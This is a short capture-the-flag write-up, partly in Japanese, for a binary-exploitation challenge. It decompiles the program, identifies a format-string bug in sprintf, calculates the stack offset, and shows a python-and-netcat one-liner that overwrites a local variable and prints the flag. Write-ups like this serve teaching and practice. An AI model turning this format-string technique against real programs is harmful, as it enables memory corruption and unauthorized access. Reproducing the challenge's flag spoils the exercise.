pwn2

analyze the binary and exploit server at: nc 35.231.63.121 1339

$ file pwn02
pwn02: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0cb9b2966c95284d3ca08d3ef9a04fd3ceb844ae, not stripped

まずはmain()から見ていく。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+9h] [rbp-7h]

  puts("enter something");
  fflush(_bss_start);
  fgets(&s, 7, stdin);
  func(&s);
  return 0;
}

func()

int __fastcall func(const char *a1)
{
  char s; // [rsp+10h] [rbp-50h]
  int v3; // [rsp+5Ch] [rbp-4h]

  v3 = 0;
  sprintf(&s, a1);
  if ( v3 != 49153 )
    return puts("not good!!");
  puts("congrats :-)");
  return print_flag();
}

sprintf(&s, a1);の脆弱性を使ってv3を 49153(0xc001)に上書きする。

stack of func()

-0000000000000058 format          dq ?                    ; offset
-0000000000000050 s               db ?

(snip)

-0000000000000004 v3              dd ?
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)

sからv3を上書きするオフセットは0x50-0x4=76

~/Desktop/CBMCTF/Pwn/pwn2 ? python -c "print '%76x\x01\xc0\x00\x00'" | nc 35.231.63.121 1339
enter something
congrats :-)
cbmctf{f0rm@t_5tr!n6s!!}